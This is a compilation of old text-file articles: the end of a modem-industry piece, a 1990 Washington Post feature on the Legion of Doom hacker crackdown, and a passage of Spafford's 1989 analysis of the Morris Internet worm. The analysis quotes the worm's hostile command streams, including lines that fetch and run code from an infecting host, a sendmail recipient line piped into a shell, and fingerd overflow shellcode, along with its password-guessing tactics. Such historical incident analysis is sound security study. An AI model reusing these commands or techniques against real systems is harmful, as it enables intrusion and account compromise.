- 3Com's U.S. Robotics. In October, it even introduced a
next-generation modem based on the "digital subscriber line"
technology that really ramps up Internet transfer speeds.

Can a technology visionary and legend fail and make a comeback
- twice? Is there really such a thing as "revenge of the nerds?"

Maybe. Just ask IBM, which is certainly a success despite its
forfeiture of control of the PC business. Or ask Apple, which
is now riding high after many predictions of its imminent demise.
But don't ask Hayes. Its creditors ran out of patience and
financing and pulled the plug this week. On Monday, the Hayes
business shut down and prepared to liquidate.

Victoria Shannon edits TribTech and can be e-mailed at:
tribtech@iht.com.

The organization that now sets modem standards is the
International Telecommunication Union, found at www.itu.ch. The
latest, and last, analog modem standard is called v.90, and
everything you ever wanted to know about it is at www.v90.com.
For more basic information, an on-line retailer has posted a
simple modem dictionary at www.modemshop.com/mdic210.txt.
The Following Article appeared in the Sunday, June 24, 1990 edition of the
Washington Post, in the Business section. (Page H1,H6)
--------------------------------------------------------------------------

THE TERMINAL MEN
Crackdown on the `Legion of Doom' Ends an Era for Computer Hackers
By Willie Schatz (Washington Post Staff Writer)

     They first sprang into existence as cartoon characters whose sole purpose
was making life miserable for television's "Super Freinds."  They were the
Legion of Doom, and they were led by arch-criminal Lex Luthor.
     In the end of course, even the elite Legion proved no match for the likes
of Superman and went the way of most of his enemies--consigned to cartoon
oblivion.
     But the Legion of Doom was reincarnated in a different form in the early
1980s by a group of adventurers poised on the edge of the electronic age.  They
called themselves hackers, and their quarry was not a visitor from another
plant. The target for "Phiber Optik," "Acid Phreak" and "Knight Lightning," as
some members of the Legion called themselves, was --and still is-- the
computer.
     The telephone networks linking corporate and government computer systems
were their maze.  The Passwords and security screens that protected netoworks
from outsider's access were obstacles to outwit.  They schemed to get inside
these systems and browse through information files at will.
     It was a game, hacker versus hacker, played in unfettered spirit of
discovery.
     "Hackers will do just about anything that doesn't involve crashing
[bringing down] a system," said a New York City member who goes by the computer
name of "Acid Phreak," but who would not further identify himself.  "Thats the
only taboo.  We don't sell military secrets.  We're jus tout to learn.  We
transfer data about records that we find in systems.  But we draw the line on
how we use that data.  We use it to play around, not to abuse it."
     And then, without much warning, it wasn't just a game anymore.
For a diverse group of men from New York City, Middletown, Md., and elsewhere,
the change announced itself in the past few months through a series of knocks
on the door by investigators bearing warrants. In raids that followed a
two-year, nationwide investigation of potential computer fraud, Secret Service
agents seized 42 computers, 23,000 computer disks, and other items from
hackers, including Acid Phreak and Phiber Optik.  The equipment will not be
returned to its owners until the service finishes examining it as evidence for
possible criminal violations.
     So far, the Secret Service sweep-- called Operation Sun Devil-- has
produced only two arrests.
     Other investigations linked to the Secret Service campaign have resulted
in serveral indictments of hackers, some of whoma re alleged to be members of
the Legion of Doom.  Those indicted have been charged with violations such as
useing a computer without authorization, interstate transportation of the
private information that was in the computer and fraudulently sending
unauthorized information across state lines.
     "We're authorized to enforce the computer fraud act, and we're doing it to
the best of our ability," said Gary Jenkins, assistant director of
investigations for the Secret Service.  "We're not interested in cases that
are at the lowest threshold of violating the law," such as accessing a
government computer without authorization, he said.  "They have to be major
criminal violators before we get involved."
     The law enforcer's view of the hacker contrasts sharply with the more
benign view of just a few years ago, view sthat the hacker community still
holds today.
     "The government's busting kids just for being curious," said the hacker
Acid Phreak. "Just because they're in [the system], they [atuhorities]
automatically assume they're criminals.  The government and some companies are
getting free lessions in computer security, but they're prosecuting us like
we're criminals.  It's like hacking's the worst thing since communism.
Meanwhile, there are real [computer] criminals out there making real money."
     Curious kids or criminals?  That the question even is being asked about
the Legion of Doom members and others shows the dimension of change that has
taken place.
     When Steven Levy wrote his 1984 book, "Hackers: Heroes of the Computer
Revolution," he said: "Hackers are computer programmers and designers who
regard computing as the most important thing in the world.  Beneath their often
unimposing exteriors, they were adventurers, visionaries, risk-takers, artists
... and the ones who most clearly saw why the computer was a truly
revolutionary tool."
     Among them flows "a common philoophy which seemed tied to the elegantly
flowing logic of the computer itself.  It was a philosphy of sharing, openess,
decentralization and getting your hands on the machine at any cost-- to improve
the machines, and to improve the world. ..."
     "It's okay to do anything in the name of learning as long as you don't
cause harm," a veteran hacker said.  "You have the right to access any
information that can be accessed [through your technique.]  We also feel if
they're not smart enough to stop us, we have the right to keep doing anything.
That may be technical arrogance, but it's always there."
     And there were results from the concentration of all this intellectual
energy.
     Hacking helped energize both the personal computer industry and the
software industry.  Steve Jobs and Wozniak, whose creation of the Apple
computer made the machine accessible to average people, gained most of their
knowledge from hacking.  The same holds true for Bill Gates, whose fascination
with software eventually led to the creation of Microsoft Corp., now the
world's leading producer of operating programs for IBM personal computers.
     But with the increasing dependence of business and society upon electronic
networks, the incursions of hackers became less and less tolerable.
     As early as 1984, a report by the House judiciary Committee called
attention to the "activities of so-called `hackers', who have been able to
access both private and public computer systems, sometimes with potentially
serious results."
     The report also quoted Wilbur Miller, then president of Drake University,
who told the committee, that there has been a tendency on the part of the
public to view such violations as "intellectual pranksterism."
     "This is simply not the case," Miller Added.  The ubiquity of computers
in virtually every dimension of our everyday lives underlines this point and
dictates our concern."
     Congress responded by passing the Counterfeit Access Device and Computer
Fraud and Abuse Act, which provided penalties of as much as three months in
jail for unauthorized access to computers.  A 1986 revision established
criminal penalties for six additional types of unauthorized computer access,
including entering government computers.
     The legislation, while not halting hacking, apparently has curbed it
severely.  The law authorized the Secret Service to investigate offenses, and
the agency has responded in ways that have spawned something of a backlash
among computer users.
     Mitchell Kapor, the inventor of Lotus 1-2-3, the world's most popular
financial software package, is expected t oannounce next month the formation of
a coalition that will establish a hackers' legal defense fund, lobby Congress
to change the 1984 law and help fight what Kapor said had the potential to be a
"witch hunt."

Birth of the Legion
-------------------------------------------------------------------------------
     None of this was an issue when the creator of the Legion of Doom took as
his model, Lex Luthor and the cartoon Legion.  The computer group was loosely
based on the television characters, who had names such as Black Manta and
Bizarro.
     "The name [Legion of Doom] has nothing to do with the group's intentions,"
said an 18-year-old New Yorker whose computer name is Phiber Optik.  The name
is a cartoon spoof, he said.
     "But it is a name that demands respect," he said.  "it's prupose was the
get the best minds of the time together and have them communicate with each
other.  The name doesn't demand any respoect now, though.  It accomplished much
more a few years ago."
     And the group, which he said never had more than 15 to 20 members
apparently has become much less particular about the quality of those members.
     "Now it's almost life if you say you're in, you are," said another Legion
member, a computer consultant whose eqquipment was seized by the Secret Service
as part of the Sun Devil investigations.  "We dont have the same standards.
     "And I think a lot of our goals have change," he added. "I know I won't be
able to hack the way I used to."
     Despite the absence of their hardware and software, however, the two are
far better off thhan one of their alleged Legion colleagues.

A Hackers Obession
------------------------------------------------------------------------------
     Leonard Rose Jr., a 31-year-old computer consultant and hacker from
Middletown, Md., whose computer name is "Terminus," had his house searched Feb.
2 as part of Operation Sun Devil. According to Rose, it required half a moving
truck and a 35-page inventory to account for the possessions removed by the
agency.  He also says the seizure has left him unable to operate his consulting
company, Netsys Inc.
     As a result of the search, Rose was indicted May 15 in Baltimore on five
counts of computer fraud, including electronically transmitting a computer
program that was the property of American Telephone & Telegraph Co., acharges
Rose has denied.  According to the indictment, Rose was "associated" with the
Legion.
     Rose began his lifelong fascination with electronics when he was 5 years
old. His father, an engineer who tested solid-fuel rocket engines for Morton
Thiokol Corp., gave Rose old junk radios.  Rode would take them to the basement
of the family's Elkton, Md., house and disassemble them.  Then he started
building radios from scratch.
     After a six-year ARmy stint spent mostly in Korea, Rose moved to New
York's suburbs and began designing computer axial tomography (CAT) scanners
and magnetic resonance image (MRI) machines for major medical technological
companies.  While preforming those tasks, he established a bulletin board
called "APPLENET" that eventually attracted hundreds of subscribers.
     "I was a hacker in the original sense-- someone who loves computers and
can learn as much as can be learned about a computer," Rose said in an
interview.
     "I was obsessed. Hacking gave me the edge on my peers and co-workers.  The
higher the technology I worked on, the better my career would be.  Other people
didn't stand a chance when they were competing with me.  That was my goal and
that's what happened.  I think it was a psychological carryover from my days in
the cellar.  But I never let it take over my life.  I didn't lose perspective."
     His obsession had intensified by 1985, when he moved to Baltimore to take
a job with a local medical technology company and he and his Korean-born wife
had their first child.  Rose continued to hone his skills through the use of
more advanced computer equipment, and that expertise made Netsys succesful.
     The the Secret Service came.  Since its visit, Rose said, his client base
has dwindeled to one Baltimore-based accounting firm.

The Battle Continues ...
------------------------------------------------------------------------------
     For its part, the Secret Service says it isn't targeting any particular
group of hackers.
     "We don't really now who belongs to the Legion of Doom," said Dale Boll,
assistant special agent in charge of the Secret Service's fraud division.
"We've never given them much real credence... They haven't been a predisposed
target.  We focus on individuals comitting serious offenses."
     "We are not in the business of slowing down technological innovation or
stopping the Lewis and Clarks of the 21st century," said Earl Devaney, special
agent in charge of the fraud division.  "We're only looking for folks
committing federal crimes and oding malicious damage."
     "We think the deterrent effect of Operation Sun Devil has been very
beneficial," he added.  "A lot of hackers get lulled into a sense of anonymity
behind their computers.  There's a psychological sense they won't get caught.
But now they know they will."
     That thought may slwo them, but it apparently will not stop them.
     "After all this stuff, we know what not to do next time," Phiber Optik
said.  "And there will always be a next time."

------------------------------------------------------------------------------
  This article typed by Laughing Gas on 06/24/90.  Chaos, Inc News Services.
------------------------------------------------------------------------------

Ok dudes, grabed this of a CD-ROM disk of articles, explains how the internet
worm worked.
            Chamelion

Journal:   Communications of the ACM  June 1989  v32 n6 p678(10)

Title:     Crisis and aftermath. (the Internet worm)
Author:    Spafford, Eugene H.

Summary:   The Internet computer network was attacked on Nov 2, 1988, by a
computer worm.  Although the program affected only Sun Microsystems Sun-3
workstations and VAX computers running a variant of version 4 of the Berkeley
Unix, the program spread over a huge section of the network.  Early the
following day a number of methods for containing and eradicating the virus
had been discovered and published.  It was discovered that the worm exploited
flaws in the Unix operating system's security routines and used some of
Unix's own utilities to propagate itself.  A complete description of the
workings of the worm and its methods of entry into Unix systems are
discussed.  The aftermath of the infection and the motives of Robert T.
Morris, its author, are also discussed.

Full Text:

Crisis and Aftermath On the evening of November 2, 1988 the Internet came
under attack from within.  Sometime after 5 p.m., a program was executed on
one or more hosts connected to the Internet.  That program collected host,
network, and user information, then used that information to break into other
machines using flaws present in those systems' software.  After breaking in,
the program would replicate itself and the replica would attempt to infect
other systems in the same manner.

Although the program would only infect Sun Micro-systems' Sun 3 systems and
VAX computers running variants of 4 BSD UNIX, the program spread quickly, as
did the confusion and consternation of system administrators and users as
they discovered the invasion of their systems.  The scope of the break-ins
came as a great surprise to almost everyone, despite the fact that UNIX has
long been known to have some security weaknesses (cf. [4, 12, 13]).

The program was mysterious to users at sites where it appeared. Unusual files
were left in the /usr/tmp directories of some machines, and strange messages
appeared in the log files of some of the utilities, such as the sendmail mail
handling agent.  The most noticeable effect, however, was that systems became
more and more loaded with running processes as they became repeatedly
infected. As time went on, some of these machines bacame so loaded that they
were unable to continue any processing; some machines failed completely when
their swap space or process tables were exhausted.

By early Thursday morning, November 3, personnel at the University of
California at Berkeley and Massachusetts Institute of Technology (MIT) had
"captured" copies of the program and began to analyze it. People at other
sites also began to study the program and were developing methods of
eradicating it.  A common fear was that the program was somehow tampering
with system resources in a way that could not be readily detected--that while
a cure was being sought, system files were being altered or information
destroyed.  By 5 a.m. Thursday morning, less than 12 hours after the program
was first discovered on the network, the Computer Systems Research Group at
Berkeley had developed an interim set of steps to halt its spread. This
included a preliminary patch to the sendmail mail agent.  The suggestions
were published in mailing lists and on the Usenet, although their spread was
hampered by systems disconnecting from the Internet to attempt a
"quarantine."

By about 9 p.m. Thursday, another simple, effective method of stopping the
invading program, without altering system utilities, was discovered at Purdue
and also widely published.  Software patches were posted by the Berkeley
group at the same time to mend all the flaws that enabled the program to
invade systems.  All that remained was to analyze the code that caused the
problems and discover who had unleashed the worm--and why.  In the weeks that
followed, other well-publicized computer break-ins occurred and a number of
debates began about how to deal with the individuals staging these invasions.
There was also much discussion on the future roles of networks and security.
Due to the complexity of the topics, conclusions drawn from these discussions
may be some time in coming.  The on-going debate should be of interest to
computer professionasl everywhere, however.

HOW THE WORM OPERATED

The worm took advantage of some flaws in standard software installed on many
UNIX systems.  It also took advantage of a mechanism used to simplify the
sharing of resources in local area networks.  Specific patches for these
flaws have been widely circulated in days since the worm program attached the
Internet.

Fingerd

The finger program is a utility that allows users to obtain information about
other users.  It is usually used to identify the full name or login name of a
user, whether or not a user is currently logged in, and possibly other
information about the person such as telephone numbers where he or she can be
reached.  The fingerd program is intended to run as a daemon, or background
process, to service remote requests using the finger protocol.  This daemon
program accepts connections from remote programs, reads a single line of
input, and then sends back output matching the received request.

The bug exploited to break fingerd involved overrunning the buffer the daemon
used for input.  The standard C language I/O library has a few routines that
read input without checking for bounds on the buffer involved.  In
particular, the gets call takes input to a buffer without doing any bounds
checking; this was the call exploited by the worm.  As will be explained
later, the input overran the buffer allocated for it and rewrote the stack
frame thus altering the behavior of the program.

The gets routine is not the only routine with this flaw.  There is a whole
family of routines in the C library that may also overrun buffers when
decoding input or formatting output unless the user explicitly specifies
limits on the number of characters to be converted.  Although experienced C
programmers are aware of the problems with these routines, they continue to
use them.  Worse, their format is in some sense codified not only by
historical inclusion in UNIX and the C language, but more formally in the
forthcoming ANSI language standard for C.  The hazard with these calls is
that any network server or privileged program using them may possibly be
compromised by careful precalculation of the (in)appropriate input.

Interestingly, at least two long-standing flaws based on this underlying
problem have recently been discovered in standard BSD UNIX commands.  Program
audits by various individuals have revealed other potential problems, and
many patches have been circulated since November to deal with these flaws.
Unfortunately, the library routines will continue to be used, and as our
memory of this incident fades, new flaws may be introduced with their use.

Sendmail

The sendmail program is a mailer designed to route mail in a heterogeneous
internetwork.  The program operates in a number of modes, but the one
exploited by the worm involves the mailer operating as a daemon (background)
process.  In this mode, the program is "listening" on a TCP port (#25) for
attempts to deliver mail using the standard Internet protocol, SMTP (Simple
Mail Transfer Protocol).  When such an attempt is detected, the daemon enters
into a dialog with the remote mailer to determine sender, recipient, delivery
instructions, and message contents.

The bug exploited in sendmail had to do with functionality provided by a
debugging option in the code.  The worm would issue the DEBUG command to
sendmail and then specify a set of commands instead of a user address.  In
normal operation, this is not allowed, but it is present in the debugging
code to allow testers to verify that mail is arriving at a particular site
without the need to invoke the address resolution routines.  By using this
option, testers can run programs to display the state of the mail system
without sending mail or establishing a separate login connection. The debug
option is often used because of the complexity of configuring sendmail for
local conditions, and it is often left turned on by many vendors and site
administrators.

The sendmail program is of immense importance on most Berkeley-derived (and
other) UNIX systems because it handles the complex tasks of mail routing and
delivery.  Yet, despite its importance and widespread use, most system
administrators know little about how it works.  Stories are often related
about how system administrators will attempt to write new device drivers or
otherwise modify the kernel of the operating system, yet they will not
willingly attempt to modify sendmail or its configuration files.

It is little wonder, then, that bugs are present in sendmail that allow
unexpected behavior.  Other flaws have been found and reported now that
attention has been focused on the program, but it is not known for sure if
all the bugs have been discovered and all the patches circulated.

Passwords

A key attack of the worm involved attempts to discover user passwords.  It
was able to determine success because the encrypted password of each user was
in a publicly readable file.  In UNIX systems, the user provides a password
at sign-on to verify identity.  The password is encrypted using a permuted
version of the Data Encryption Standard (DES) algorithm, and the result is
compared against a previously encrypted version present in a word-readable
accounting file.  If a match occurs, access is allowed.  No plaintext
passwords are contained in the file, and the algorithm is supposedly
noninvertible without knowledge of the password.

The organization of the passwords in UNIX allows nonprivileged commands to
make use of information stored in the accounts file, including
authentification schemes using user passwords.  However, it also allows an
attacker to encrypt lists of possible passwords and then compare them against
the actual passwords without calling any system function.  In effect, the
security of the passwords is provided by the prohibitive effort of trying
this approach with all combinations of letters.  Unfortunately, as machines
get faster, the cost of such attempts decreases.  Dividing the task among
multiple processors further reduces the time needed to decrypt a password.
Such attacks are also made easier when users choose obvious or common words
for their passwords.  An attacker need only try lists of common words until a
match is found.

The worm used such an attack to break passwords.  It used lists of words,
including the standard online dictionary, as potential passwords.  It
encrypted them using a fast version of the password algorithm and then
compared the result against the contents of the system file.  The worm
exploited the accessibility of the file coupled with the tendency of users to
choose common words as their passwords.  Some sites reported that over 50
percent of their passwords were quickly broken by this simple approach.

One way to reduce the risk of such attacks, and an approach that has already
been taken in some variants of UNIX, is to have a shadow password file.  The
encrypted passwords are saved in a file (shadow) that is readable only by the
system administrators, and a privileged call performs password encryptions
and comparisons with an appropriate timed delay (0.5 to 1 second, for
instance).  This would prevent any attempt to "fish" for passwords.
Additionally, a threshold could be included to check for repeated password
attempts from the same process, resulting in some form of alarm being raised.
Shadow password files should be used in combination with encryption rather
than in place of such techniques, however, or one problem is simply replaced
by a different one (securing the shadow file); the combination of the two
methods is stronger than either one alone.

Another way to strengthen the password mechanism would be to change the
utility that sets user passwords.  The utility currently makes a minimal
attempt to ensure that new passwords are nontrivial to guess.  The program
could be strengthened in such a way that it would reject any choice of a word
currently in the online dictionary or based on the account name.

A related flaw exploited by the worm involved the use of trusted logins.  One
of the most useful features of BSD UNIX-based networking code is the ability
to execute tasks on remote machines. To avoid having to repeatedly type
passwords to access remote accounts, it is possible for a user to specify a
list of host/login name pairs that are assumed to be "trusted," in the sense
that a remote access from that host/login pair is never asked for a password.
This feature has often been responsible for users gaining unauthorized access
to machines (cf. [11]), but it continues to be used because of its great
convenience.

The worm exploited the mechanism by locating machines that might "trust" the
current machine/login being used by the worm.  This was done by examining
files that listed remote machine/logins used by the host.  Often, machines
and accounts are reconfigured for reciprocal trust.  Once the worm found such
likely candidates, it would attempt to instantiate itself on those machines
by using the remote execution facility--copying itself to the remote machines
as if it were an authorized user performing a standard remote operation.

To defeat such future attempts requires that the current remote access
mechanism be removed and possibly replaced with something else.  One
mechanism that shows promise in this area is the Kerberos authentication
server.  This scheme uses dynamic session keys that need to be updated
periodically.  Thus, an invader could not make use of static authorizations
present in the file system.

High Level Description

The worm consisted of two parts: a main program, and a bootstrap or vector
program.  The main program, once established on a machine, would collect
information on other machines in the network to which the current machine
could connect.  It would do this by reading public configuration files and by
running system utility programs that present information about the current
state of network connections.  It would then attempt to use the flaws
described above to establish its bootstrap on each of those remote machines.

The worm was brought over to each machine it infected via the actions of a
small program commonly referred to as the vector program or as the grappling
hook program.  Some people have referred to it as the l1.c program, since
that is the file name suffix used on each copy.

This vector program was 99 lines of C code that would be compiled and run on
the remote machine.  The source for this program would be transferred to the
victim machine using one of the methods discussed in the next section.  It
would then be compiled and invokedon the victim machine with three command
line arguments: the network address of the infecting machine, the number of
the network port to connect to on that machine to get copies of the main worm
files, and a magic number that effectively acted as a one-time-challenge
password.  If the "server" worm on the remote host and port did not receive
the same magic number back before starting the transfer, it would immediately
disconnect from the vector program.  This may have been done to prevent
someone from attempting to "capture" the binary files by spoofing a worm
"server."

This code also went to some effort to hide itself, both by zeroing out its
argument vector (command line image), and by immediately forking a copy of
itself.  If a failure occurred in transferring a file, the code deleted all
files it had already transferred, then it exited.

Once established on the target machine, the bootstrap would connect back to
the instance of the worm that originated it and transfer a set of binary
files (precompiled code) to the local machine.  Each binary file represented
a version of the main worm program, compiled for a particular computer
architecture and operating system version.  The bootstrap would also transfer
a copy of itself for use in infecting other systems.  One curious feature of
the bootstrap has provoked many questions, as yet unanswered: the program had
data structures allocated to enable transfer of up to 20 files; it was used
with only three.  this has led to speculation whether a more extensive
version of the worm was planned for a later date, and if that version might
have carried with it other command files, password data, or possibly local
virus or trojan horse programs.

Once the binary files were transferred, the bootstrap program would load and
link these files with the local versions of the standard libraries.  One
after another, these programs were invoked.  If one of them ran successfully,
it read into its memory copies of the bootstrap and binary files and then
deleted the copies on disk. It would then attempt to break into other
machines.  If none of the linked versions ran, then the mechanism running the
bootstrap (a command file or the parent worm) would delete all the disk files
created during the attempted infection.

Step-by-Step Description

This section contains a more detailed overview of how the worm program
functioned.  The description in this section assumes that the reader is
somewhat familiar with standard UNIX commands and with BSD UNIX network
facilities.  A more detailed analysis of operation and components can be
found in [16], with additional details in [3] and [15].

This description starts from the point at which a host is about to be
infected.  At this point, a worm running on another machine has either
succeeded in establishing a shell on the new host and has connected back to
the infecting machine via a TCP connection, or it has connected to the SMTP
port and is transmitting to the sendmail program.  The infection proceeded as
follows:

1. A socket was established on the infecting machine for the vector program
to connect to (e.g., socket number 32341).  A challenge string was
constructed from a random number (e.g., 8712440).  A file name base was also
constructed using a random number (e.g., 14481910).

2. The vector program was installed and executed using one of two methods:

a. Across a TCP connection to a shell, the worm would send the following
commands (the three lines beginning with "cc" and the two lines beginning
with "echo" were sent as a single line): PATH=/bin:/usr/bin:/usr/ucb cd;
/usr/tmp echo gorch49; sed '/int zz/q' > x14481910.c; echo gorch50 [text of
vector program] int zz; cc -o z14481910 x14481910.c;./x14481910 128.32.134.16
32341 8712440; rm -f x14481910 x14481910.c; echo DONE

Then it would wait for the string "DONE" to signal that the vector program
was running.

b. Using the SMTP connection, it would transmit (the three lines beginning
with "cc" and the two lines beginning with "rcpt" were sent as a single
line): debug mail from: </dev/null> rcpt to: <"!sed -e '1,/*$/'d! /bin/sh;
exit 0"> data cd /usr/tmp cat > x14481901.c << 'EOF' [text of vector program]
EOF cc -o x14481910 x14481910.c; x14481910 128.32.134.16 32341 8712440; rm -f
x14481910 x14481910.c quit

The infecting worm would then wait for up to two minutes on the designated
port for the vector to contact it.

3. The vector program then connected to the "server," sent the challenge
string, and transferred three files: a Sun 3 binary version of the worm, a
VAX version, and the source code for the vector program.  After the files
were copied, the running vector program became (via the execl call) a shell
with its input and output still connected to the server worm.

4. The server worm sent the following command stream to the connected shell:
PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then P=x14481910 else P=sh
fi

Then, for each binary file it had transferred (just two in this case,
although the code is written to allow more), it would send the following form
of command sequence: cc -o $P x14481910, sun3.o ./$P -p $$ x14481910,sun3.o
x14481910,vax.o x14481910,11.c rm -f $P

The rm would succeed only if the linked version of the worm failed to start
execution.  If the server determined that the host was now infected, it
closed the connection.  Otherwise, it would try the other binary file.  After
both binary files had been tried, it would send over rm commands for the
object files to clear away all evidence of the attempt at infection.

5. The new worm on the infected host proceeded to "hide" itself by obscuring
its argument vector, unlinking the binary version of itself, and killing its
parent (the $$ argument in the invocation). It then read into memory each of
the worm binary files, encrypted each file after reading it, and deleted the
files from disk.

6. Next, the worm gathered information about network interfaces and hosts to
which the local machine was connected.  It built lists of these in memory,
including information about canonical and alternate names and addresses.  It
gathered some of this information by making direct ioctl calls, and by
running the netstat program with various arguments.  It also read through
various system files looking for host names to add to its database.

7. It randomized the lists it constructed, then attempted to infect some of
those hosts.  For directly connected networks, it created a list of possible
host numbers and attempted to infect those hosts if they existed.  Depending
on the type of host (gateway or local network), the worm first tried to
establish a connection on the telnet or rexec ports to determine reachability
before it attempted one of the infection methods.

8. The infection attempts proceeded by one of three routes: rsh, fingerd, or
sendmail.

a. The attack via rsh was done by attempting to spawn a remote shell by
invocation of (in order of trial) /usr/ucb/rsh, /usr/bin/rsh, and /bin/rsh.
If successful, the host was infected as in steps 1 and 2(a).

b. The attack via the finger daemon was somewhat more subtle.  A connection
was established to the remote finger server daemon and then a specially
constructed string of 536 bytes was passed to the daemon, overflowing its
input buffer and overwriting parts of the stack.  For standard 4BSD versions
running on VAX computers, the overflow resulted in the return stack frame for
the main routine being changed so that the return address pointed into the
buffer on the stack.  The instructions that were written into the stack at
that location were: pushl $68732f '/sh\0' pushl $6e69622f '/bin' movl sp, r10
pushl $0 pushl $0 pushl r10 pushl $3 movl sp,ap chmk $3b

That is, the code executed when the main routine attempted to return was:
execve("/bin/sh", 0, 0)

On VAXs, this resulted in the worm connected to a remote shell via the TCP
connection.  The worm then proceeded to infect the host as in steps 1 and
2(a).  On Suns, this simply resulted in a core dump since the code was not in
place to corrupt a Sun version of fingerd in a similar fashion.  Curiously,
correct machine-specific code to corrupt Suns could have been written in a
matter of hours and included, but was not [16].

c. The worm then tried to infect the remote host by establishing a connection
to the SMTP port and mailing an infection, as in step 2(b).

Not all the steps were attempted.  As soon as one method succeeded, the host
entry in the internal list was marked as infected and the other methods were
not attempted.

9. Next, it entered a state machine consisting of five states. Each state but
the last was run for a short while, then the program looped back to step 7
(attempting to break into other hosts via sendmail, finger, or rsh).  The
first four of the five states were attempts to break into user accounts on
the local machine.  The fifth state was the final state, and occurred after
all attempts had been made to break all passwords.  In the fifth state, the
worm looped forever trying to infect hosts in its internal tables and marked
as not yet infected.  The first four states were:

a. The worm read through the /etc/hosts.equiv files and /.rhosts files to
find the names of equivalent hosts.  These were marked in the internal table
of hosts.  Next, the worm read the /etc/passwd (the account and password
file) file into an internal data structure.  As it was doing this, it also
examined the .forward file (used to forward mail to a different host
automatically) in each user home directory and included those host names in
its internal table of hosts to try.  Oddly, it did not similarly check user
.rhosts files.

b. The worm attempted to break each user password using simple choices.  The
worm first checked the obvious case of no password. Then, it used the account
name and user information field to try simple passwords.  Assume that the
user had an entry in the password file like:
account:abcdefghijklm:100:5:User, Name:/usr/account:/bin/sh

(These represent, respectively, the account name, the encrypted password, the
user ID number, the user's default group ID number, per-user information
field, the pathname of the user's home account, and the pathname of the
user's default command interpreter or shell.)  The words tried as potential
passwords would be account, accountaccount, User, Name, user, name, and
tnuocca.  These are, respectively, the account name, the account name
concatenated with itself, the first and last names of the user, the user
names with leading capital letters turned to lowercase, and the account name
reversed.  Experience described in [4] indicates that on systems where users
are naive about password security, these choices may work for a significant
percentage of user accounts.

Step 10 describes what was done if a password "hit" was achieved.

c. The third stage in the process involved trying to break the password of
each user by trying each word present in an internal dictionary of words.
This dictionary of 432 words was tried against each account in a random
order, with password "hits" being handled as described in step 10.  (The
complete dictionary is given in [16].)

d. The fourth stage was entered if all other attempts failed.  For each word
in the UNIX online dictionary, the worm would see if it was the password to
any account.  In addition, if the word in the dictionary began with an
uppercase letter, the letter was converted to lowercase and that word was
also tried against all the passwords.

10. Once a password was broken for any account, the worm would attempt to
break into remote machines where that user had accounts. The worm would scan
the .forward and .rhosts files of the user at this point, and identify the
names of remote hosts that had accounts used by the target user.  It then
attempted two attacks:

a. The worm would first attempt to create a remote shell using the rexec
service.  The attempt would be made using the account name given in the
.forward or .rhosts file and the user's local password.  This took advantage
of the fact that users often have the same password on their accounts on
multiple machines.

b. The worm would do a rexec to the current host (using the local user name
and password) and would try a rsh command to the remote host using the
username taken from the file.  This attack would succeed in those cases where
the remote machine had a hosts.equiv file or the user had a .rhosts file that
allowed remote execution without a password.

If the remote shell was created either way, the attack would continue as in
steps 1 and 2(a).  No other use was made of the user password.

Throughout the execution of the main loop, the worm would check for other
worms running on the same machine.  To do this, the worm would attempt to
connect to another worm on a local, predetermined TCP socket.  If such a
connection succeeded, one worm would (randomly) set its pleasequit variable
to 1, causing that worm to exit after it had reached part way into the third
stage (9c) of password cracking.  This delay is part of the reason many
systems had multiple worms running: even though a worm would check for other
local worms, it would defer its self-destruction until significant effort had
been made to break local passwords.  Furthermore, race conditions in the code
made it possible for worms on heavily loaded machines to fail to connect,
thus causing some of them to continue indefinitely despite the presence of
other worms.

One out of every seven worms would become immortal rather than check for
other local worms.  Based on a generated random number they would set an
internal flag that would prevent them from ever looking for another worm on
their host.  This may have been done to defeat any attempt to put a fake worm
process on the TCP port to kill existing worms.  Whatever the reason, this
was likely the primary cause of machines being overloaded with multiple
copies of the worm.

The worm attempted to send an UDP packet to the host ernie.berkeley.edu
approximately once every 15 infections, based on a random number comparison.
The code to do this was incorrect, however, and no information was ever sent.
Whether this was an intended ruse or whether there was actually some reason
for the byte to be sent is not currently known.  However, the code is such
that an uninitialized byte is the intended message.  It is possible that the
author eventually intended to run some monitoring program on ernie (after
breaking into an account, perhaps).  Such a program could obtain the sending
host number from the single-byte message, whether it was sent as a TCP or UDP
packet.  However, no evidence for such a program has been found and it is
possible that the connection was simply a feint to cast suspicion on
personnel at Berkeley.

The worm would also fork itself on a regular basis and kill its parent.  This
served two purposes.  First, the worm appeared to keep changing its process
identifier and no single process accumulated excessive amounts of CPU time.
Secondly, processes that have been running for a long time have their
priority downgraded by the scheduler.  By forking, the new process would
regain normal scheduling priority.  This mechanism did not always work
correctly, either, as we locally observed some instances of the worm with
over 600 seconds of accumulated CPU time.

If the worm ran for more than 12 hours, it would flush its host list of all
entries flagged as being immune or already infected. The way hosts were added
to this list implies that a single worm might reinfect the same machines
every 12 hours.

AFTERMATH

In the weeks and months following the release of the Internet worm, there
have been a number of topics hotly debated in mailing lists, media coverage,
and personal conversations.  I view a few of these as particularly
significant, and will present them here.

Author, Intent, and Punishment

Two of the first questions to be asked--even before the worm was
stopped--were simply the questions who and why.  Who had written the worm,
and why had he/she/they loosed it upon the Internet?  The question of who was
answered quite shortly thereafter when the New York Times identified Robert
T. Morris.  Although he has not publicly admitted authorship, and no court of
law has yet pronounced guilt, there seems to be a large body of evidence to
support such an identification.

Various officials have told me that they have obtained statements from
multiple individuals to whom Morris spoke about the worm and its development.
They also have records from Cornell University computers showing early
versions of the worm code being tested on campus machines.  They also have
copies of the worm code, found in Morris' account.

Thus, the identity of the author seems fairly well-established. But his
motive remains a mystery.  Speculation has ranged from an experiment gone
awry to an unconscious act of revenge against his father, who is the National
Computer Security Center's chief scientist.  All of this is sheer
speculation, however, since no statement has been forthcoming from Morris.
All we have to work with is the decompiled code for the program and our
understanding of its effects.  It is impossible to intuit the real motive
from those or from various individuals' experiences with the author.  We must
await a definitive statement by the author to answer the question why?
Considering the potential legal consequences, both criminal and civil, a
definitive statement from Morris may be some time in coming, if it ever does.

Two things have impressed many people (this author included) who have read
the decompiled code.  First, the worm program contained no code to explicitly
damage any system on which it ran.  Considering the ability and knowledge
evidenced by the code, it would have been a simple matter for the author to
have included such commands if that was his intent.  Unless the worm was
released prematurely, it appears that the author's intent did not involve
destruction or damage of any data or system.

The second feature of note was that the code had no mechanism to halt the
spread of the worm.  Once started, the worm would propagate while also taking
steps to avoid identification and capture.  Due to this and the complex
argument string necessary to start it, individuals who have examined the worm
(this author included) believe it unlikely that the worm was started by
accident or was not intended to propagate widely.

In light of our lack of definitive information, it is puzzling to note
attempts to defend Morris by claiming that his intent was to demonstrate
